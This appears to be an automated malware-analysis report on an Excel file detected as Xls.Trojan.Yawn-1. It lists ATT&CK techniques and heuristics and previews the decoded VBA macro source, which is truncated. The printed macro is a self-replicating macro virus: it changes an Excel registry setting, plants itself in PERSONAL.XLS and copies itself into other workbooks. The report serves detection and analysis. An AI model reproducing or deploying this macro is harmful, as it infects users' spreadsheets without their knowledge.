MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The critical ClamAV detection and the presence of a VBA macro with an Auto_Open subroutine strongly indicate malicious intent. The Auto_Open macro attempts to write a DWORD value named 'Options6' to a specific registry key under HKEY_CURRENT_USER, suggesting an attempt to modify Excel's behavior or establish persistence. The macro code is partially truncated, but the registry manipulation is clear.
Heuristics 3
-
ClamAV: Xls.Trojan.Yawn-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Yawn-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16186 bytes |
SHA-256: fdf9f1dc2ce7390a76ee935ab923eef3fa6cbf2f751b3b34d9df7fc300a58b90 |
|||
|
Detection
ClamAV:
Xls.Trojan.Yawn-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "KO"
Private Declare Function RegOpenKeyExA Lib "ADVAPI32.DLL" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Private Declare Function RegSetValueExA Lib "ADVAPI32.DLL" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpValue As String, ByVal cbData As Long) As Long
Private Declare Function RegCloseKey Lib "ADVAPI32.DLL" (ByVal hKey As Long) As Long
Global Const REG_DWORD As Long = 4
Global Const HKEY_CURRENT_USER As Long = &H80000001
Dim p As String
Dim AppS As String
'taitai
Private Sub auto_open()
u = RegOpenKeyExA(HKEY_CURRENT_USER, "Software\Microsoft\Office\8.0\Excel\Microsoft Excel", 0, KEY_ALL_ACCESS, k)
u = RegSetValueExA(k, "Options6", 0, REG_DWORD, Chr$(0), 4)
u = RegCloseKey(k)
p = Application.PathSeparator
AppS = Application.StartupPath
DelMcr
If UCase(ThisWorkbook.Name) = "PERSONAL.XLS" Then
Application.OnSheetActivate = "ActOpf_Evt"
ActOpf_Evt
Else
CkStrUP
End If
End Sub
Private Sub ActOpf_Evt()
Set ob1.app = Application
End Sub
Private Sub Chk_Opf()
On Error GoTo h_er
Application.DisplayAlerts = False
Application.ScreenUpdating = False
awn = ActiveWorkbook.Name
If Left(Right(awn, 4), 3) = ".xl" Then
aw_m_n = Chk_Mo_N(awn)
If aw_m_n = "" Then
n = Chk_Mo_N(ThisWorkbook.Name)
cop_m (n)
Workbooks(awn).Save
Else
m_n = ActiveWorkbook.VBProject.VBComponents(aw_m_n).CodeModule.Lines(9, 1)
If m_n <> "'taitai" Then
Set v_c = ActiveWorkbook.VBProject.VBComponents
For i = v_c.Count To 1 Step -1
If v_c(i).Type = 1 Or v_c(i).Type = 2 Then
v_c.Remove v_c(i)
End If
Next i
n = Chk_Mo_N(ThisWorkbook.Name)
cop_m (n)
Workbooks(awn).Save
End If
End If
End If
Application.ScreenUpdating = True
Application.DisplayAlerts = True
Exit Sub
h_er:
End Sub
Private Sub CkStrUP()
Application.DisplayAlerts = False
Application.ScreenUpdating = False
f1 = "PERSONAL.XLS"
If UCase(Dir(AppS & p & f1)) <> f1 Then
cre_f
ElseIf chk_per = False Then
Workbooks("Personal.xls").Close
Kill AppS & p & f1
cre_f
Else
End If
Workbooks("Personal.xls").Close
Workbooks.Open AppS & p & "Personal.xls"
Application.Run "Personal.xls!ActOpf_Evt"
Application.OnSheetActivate = "'" & AppS & p & f1 & "'!ActOpf_Evt"
Application.DisplayAlerts = True
Application.ScreenUpdating = True
End Sub
Private Function chk_per()
arg = "'" & AppS & p & "[Personal.xls]Sheet1" & "'!" & _
Range("C1").Range("A1").Address(, , xlR1C1)
ModuleName1 = Chk_Mo_N("Personal.xls")
If ar2 <> ModuleName1 Then
chk_per = False
Else
chk_per = True
End If
End Function
Private Function Chk_Mo_N(WkName)
On Error Resume Next
Set a1 = Workbooks(WkName).VBProject.VBComponents
For i = 1 To a1.Count
If a1(i).Type = 1 Then
Chk_Mo_N = a1(i).Name
Exit For
Else
Chk_Mo_N = ""
End If
Next i
End Function
Private Sub cre_f()
Workbooks.Add
n = Chk_Mo_N(ThisWorkbook.Name)
Range("C1") =
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.